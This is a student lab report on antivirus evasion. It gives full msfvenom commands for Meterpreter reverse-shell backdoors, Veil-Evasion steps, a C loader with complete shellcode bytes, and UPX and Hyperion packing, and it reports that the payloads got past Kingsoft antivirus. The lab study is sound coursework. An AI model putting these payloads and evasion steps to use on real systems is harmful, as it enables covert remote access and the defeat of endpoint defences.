2018-2019-2 网络对抗技术 20165337 Exp3 免杀原理与实践
基础问题回答
(1)杀软是如何检测出恶意代码的?
-
基于特征码的检测:特征码就是一段数据。如果一个可执行文件(或其他运行的库、脚本等)包含特定的数据则被认为是恶意代码。AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。
-
启发式恶意软件检测:根据些片面特征去推断;通过检测程序的行为是否属于恶意代码的行为来检测。
(2)免杀是做什么?
想方设法让自己的后门程序避免被杀毒软件检测到,实现此程序的功能
(3)免杀的基本方法有哪些?
改变特征码:加壳,shellcode等手段
改变行为:反弹连接,隧道传输等等
实验内容
实验一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
任务一:使用msf编码器生成各种后门程序及检测
1.正确使用msf编码器,生成exe文件
首先对实验二生成的backdoor后门程序放到网站VirusTotal或Virscan进行检测
后门程序很容易被发现识别
再使用msf编码器对后门程序进行一次和多次的编码,再进行检测
一次编码使用命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.1.154 LPORT=5337 -f exe > 20165337_backdoor.exe
一次编码后效果不大,依旧容易被发现
使用十次编码
十次编码使用命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.154 LPORT=5303 -f exe > yy_backdoor.exe
编码十次也没有区别,因为编码总需要解码,杀软只需要把解码的程序代码编入检测库中就可以查杀这一类程序,除非使用新的编码模式。还有msfvenom生成backdoor的模板是固定的,只有用新的模板也许可以不被发现。
2.利用msfvenom生成jar文件
生成java后门程序的命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5303 x> yy1_backdoor_java.jar
先生成jar文件,再放入网页扫描
一个软件引擎还是有很多能发现是木马程序,但另一个引擎能发现的就少多了,说明java后门程序还是有效的。
3.msfvenom生成php文件
生成php后门程序的命令如下:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5337 x> yy2_backdoor.php
生成php文件后放入网页进行检测
能发现是后门程序的杀软已经相当少了
任务二:使用veil-evasion生成后门程序及检测
安装指令:sudo apt-get install veil-evasion
安装完毕后先输入veil
然后输入use evasion进入Evil-Evasion
再输入use c/meterpreter/rev_tcp.py进入配置界面
然后设置反弹连接IP set LHOST 192.168.1.154
在设置一下端口,set LPORT 5337设置完成如下图
输入generate生成文件,接着输入生成的程序名字veil_c_5337
放入网页检测
发现并没有什么变化,依然能被很容易的检测出来
任务三:半手工注入Shellcode并执行
使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5337 -f c这是用C语言生成一段shellcode
再放入codeblocks里加上头文件编译运行一下
#include<stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x01\x9a"
"\x68\x02\x00\x14\xd9\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main()
{
int (*func)() = (int(*)())buf;
func();
}
然后居然在开了金山毒霸的情况下完美运行了,听说别人都会被自己的杀软检测出来,感觉自己要换个杀软了
实验二:通过组合应用各种技术实现恶意代码免杀
任务一:半手工制作shellcode加压缩壳
首先使用压缩壳可以减少应用体积,如ASPack,UPX
把之前的liuyudong.exe放到kali中使用命令upx liuyudong.exe -o yybc_upxed.exe加一个压缩壳
然后拿金山毒霸检测一下,果不其然没有任何问题
然后在杀软开着的情况下运行,运行成功并且能取得权限
放入网页检测还是能被轻易发现
任务二:加密壳
使用加密壳版权保护,反跟踪。如ASProtect,Armadillo
将上一个文件拷贝到/usr/share/windows-binaries/hyperion/中
进入目录并输入命令wine hyperion.exe -v yy_upxed.exe yy_upxed_Hyperion.exe
成功后如下
用杀毒软件检查一下发现没有问题
尝试回连并发现可以成功
实验三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
同学使用的是金山毒霸
程序与软件管家共存
成功回连结果
实验中遇到的问题
最最难受的问题是我的kali的网有毒,桥接模式不能联网,需要先换成别的再改为桥接才能好,不知道原理,只知道这样能解决
使用杀软一定能防止病毒吗?
不一定,但是杀软能过滤绝大多数病毒,还是有效果的
实验心得
本次实验了解了免杀原理,也亲手制作了能避免被自己的杀软查杀的后门程序,之后和同学交流了很久过后,发现360和腾讯查杀力度一般,但是几次运行后门之后还是有效果;金山毒霸就很low,不能发现任何后门程序,唯一作用就是忽悠我设置金山毒霸的浏览器首页;最最牛逼的是Windows Defencer,所有实验使用的后门程序全都能被检测到,力度极大,恐怖如斯,以后还是换个靠谱的杀软比较好。
